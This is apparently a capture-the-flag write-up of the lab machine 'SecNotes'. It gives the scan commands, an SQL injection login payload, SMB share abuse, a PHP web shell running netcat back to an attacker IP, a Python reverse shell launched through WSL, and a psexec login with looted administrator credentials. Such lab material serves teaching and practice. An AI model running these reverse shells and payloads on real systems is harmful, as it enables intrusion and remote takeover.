Read BlogpostsLet's Connect

SecNotes

Summary

  • Only three ports were open: 80 (web), 445 (SMB), and 8808 (IIS default page).

  • The main site (/login.php) hosted a note-taking app vulnerable to SQL injection and CSRF.

  • Exploited SQLi via the registration form to gain access as admin by using 'OR 1 OR' as the username.

  • Retrieved SMB credentials for user tyler from the admin dashboard.

  • With SMB access, uploaded a reverse shell using nc.exe to the writable new-site share.

  • Got initial shell via browser-based trigger of the uploaded PHP payload.

  • Privilege escalation was achieved using WSL abuse — the bash.exe binary was found, and we obtained a root shell through reverse shell from WSL.

  • bash_history revealed Administrator credentials.

  • Used psexec with Administrator creds to get SYSTEM access.

Enumeration

nmap -p- -T5 10.10.10.97 -vv
sudo nmap -sC -sN -A -oN full.nmap -p80,135,139,445,8808 10.10.10.97

Discovered:

  • Port 80: Secure Notes login panel (login.php)

  • Port 8808: Default IIS page

  • Port 445: SMB with new-site share (eventually writable)

Initial Foothold

Web App (Port 80)

SQL Injection on Sign-Up page:

# Registration payload
Username: 'OR 1 OR'
Password: anything

Logged in as admin and saw notes containing the following credentials:

Username: tyler
Password: <FINDIT!>

SMB Enumeration

crackmapexec smb 10.10.10.97 -u 'tyler' -p <FINDIT!> --shares

# Result:
new-site - READ,WRITE

Uploaded reverse shell via SMB:

  • nc.exe

  • PHP shell to execute nc.exe -e cmd.exe

Then triggered it from browser:

<?php system("nc.exe -e cmd.exe 10.10.16.2 8888"); ?>

Listener:

nc -lvnp 8888

Shell obtained!

Privilege Escalation

WSL Abuse

Located WSL:

where /R C:\windows bash.exe
# Found at:
C:\Windows\WinSxS\...\bash.exe

Checked current WSL user:

wsl whoami
# Output:
root

Spawned root shell via reverse connection from WSL:

# Listener
nc -lvnp 9999

# Command on target:
wsl python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.10.16.2",9999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

Escaped limited shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Looted .bash_history → Revealed Administrator SMB credentials:

Username: administrator
Password: u6!4ZwgwOM#^OBf#Nwnh

SYSTEM Shell via psexec

impacket-psexec SECNOTES/administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97

Boom! Got SYSTEM access and root flag.

PreviousActiveNextAccess

Last updated